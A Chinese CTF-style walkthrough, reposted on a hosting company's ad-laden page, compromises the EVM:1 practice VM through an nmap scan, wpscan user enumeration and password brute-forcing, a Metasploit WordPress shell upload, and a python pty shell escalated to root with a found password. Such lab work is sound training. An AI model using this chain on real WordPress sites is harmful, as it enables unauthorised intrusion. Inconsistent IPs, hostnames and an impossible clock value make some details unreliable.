一.環(huán)境搭建

讓客戶(hù)滿(mǎn)意是我們工作的目標(biāo)，不斷超越客戶(hù)的期望值來(lái)自于我們對(duì)這個(gè)行業(yè)的熱愛(ài)。我們立志把好的技術(shù)通過(guò)有效、簡(jiǎn)單的方式提供給客戶(hù)，將通過(guò)不懈努力成為客戶(hù)在信息化領(lǐng)域值得信任、有價(jià)值的長(zhǎng)期合作伙伴，公司提供的服務(wù)項(xiàng)目有：申請(qǐng)域名、網(wǎng)絡(luò)空間、營(yíng)銷(xiāo)軟件、網(wǎng)站建設(shè)、高碑店網(wǎng)站維護(hù)、網(wǎng)站推廣。

Vulhub是一個(gè)面向大眾的開(kāi)源漏洞靶場(chǎng)，無(wú)需docker知識(shí)，簡(jiǎn)單執(zhí)行兩條命令即可編譯、運(yùn)行一個(gè)完整的漏洞靶場(chǎng)鏡像。旨在讓漏洞復(fù)現(xiàn)變得更加簡(jiǎn)單，讓安全研究者更加專(zhuān)注于漏洞原理本身。

地址

https://www.vulnhub.com/entry/evm-1,391/

下載ova鏡像文件，vbox導(dǎo)入，設(shè)置兩張?zhí)摂M網(wǎng)卡，分別為NAT模式和僅主機(jī)模式（改為默認(rèn)網(wǎng)卡配置）

ip為192.168.124.156
二.信息搜集：
（端口掃描）

nmap -A 192.168.124.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-12-16 01:45 EST
Nmap scan report for localhost (192.168.124.56)
Host is up (0.00035s latency).
Not shown: 993 closed ports
PORT   STATE SERVICE   VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|  2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
|  256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_  256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp  open  domain    ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
110/tcp open  pop3?
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap     Dovecot imapd
|_imap-capabilities: CAPABILITY
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:C4:5F:AA (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h49m59s, deviation: 2h63m12s, median: 0s
|_nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|  OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|  Computer name: ubuntu-extermely-vulnerable-m4ch2ine
|  NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
|  Domain name: \x00
|  FQDN: ubuntu-extermely-vulnerable-m4ch2ine
|_  System time: 2019-12-16T01:48:21-05:00
| smb-security-mode: 
|  account_used: guest
|  authentication_level: user
|  challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|  2.02: 
|_   Message signing enabled but not required
| smb2-time: 
|  date: 2019-12-16 01:48:21
|_  start_date: N/A

（目錄掃描）
開(kāi)始使用dirb進(jìn)行目錄掃描dirb http://192.168.124.56/

從目錄掃描看出他有wordpress所以先試試之前使用過(guò)的工具wpscan

wpscan --url http://192.168.124.56/wordpress/ -e u

成功得到賬號(hào)c0rrupt3d_brain，現(xiàn)在繼續(xù)破解他的密碼
wpscan --url http://192.168.124.56/wordpress/ -e u -P /chen.txt

成功破解出密碼24992499

現(xiàn)在開(kāi)始使用msfconsole 使用模塊

unix/webapp/wp_admin_shell_upload
set RhOSTS 192.168.124.56
set USERNAME c0rrupt3d_brain
set PassWORD 24992499
set targeturi /wordpress
run

直接進(jìn)入他的家目錄之后cd root3r 進(jìn)來(lái)之后發(fā)現(xiàn)有一個(gè)文件似乎是root密碼文件

現(xiàn)在進(jìn)行查看發(fā)現(xiàn)似乎是密碼，既然已經(jīng)知道了密碼所以接下來(lái)進(jìn)入交互頁(yè)面如下圖：

shell
python -c "import pty;pty.spawn('/bin/bash')"
su root

密碼輸入為:willy26

成功拿到root

另外有需要云服務(wù)器可以了解下創(chuàng)新互聯(lián)cdcxhl.cn，海內(nèi)外云服務(wù)器15元起步，三天無(wú)理由+7*72小時(shí)售后在線，公司持有idc許可證，提供“云服務(wù)器、裸金屬服務(wù)器、高防服務(wù)器、香港服務(wù)器、美國(guó)服務(wù)器、虛擬主機(jī)、免備案服務(wù)器”等云主機(jī)租用服務(wù)以及企業(yè)上云的綜合解決方案，具有“安全穩(wěn)定、簡(jiǎn)單易用、服務(wù)可用性高、性?xún)r(jià)比高”等特點(diǎn)與優(yōu)勢(shì)，專(zhuān)為企業(yè)上云打造定制，能夠滿(mǎn)足用戶(hù)豐富、多元化的應(yīng)用場(chǎng)景需求。

當(dāng)前文章：Vulhub-EVM1靶機(jī)的使用方法-創(chuàng)新互聯(lián)
網(wǎng)頁(yè)網(wǎng)址：http://chinadenli.net/article20/ddgcco.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供域名注冊(cè)、關(guān)鍵詞優(yōu)化、云服務(wù)器、響應(yīng)式網(wǎng)站、網(wǎng)站收錄、外貿(mào)網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶(hù)投稿、用戶(hù)轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請(qǐng)盡快告知，我們將會(huì)在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng)，如需處理請(qǐng)聯(lián)系客服。電話(huà)：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來(lái)源： 創(chuàng)新互聯(lián)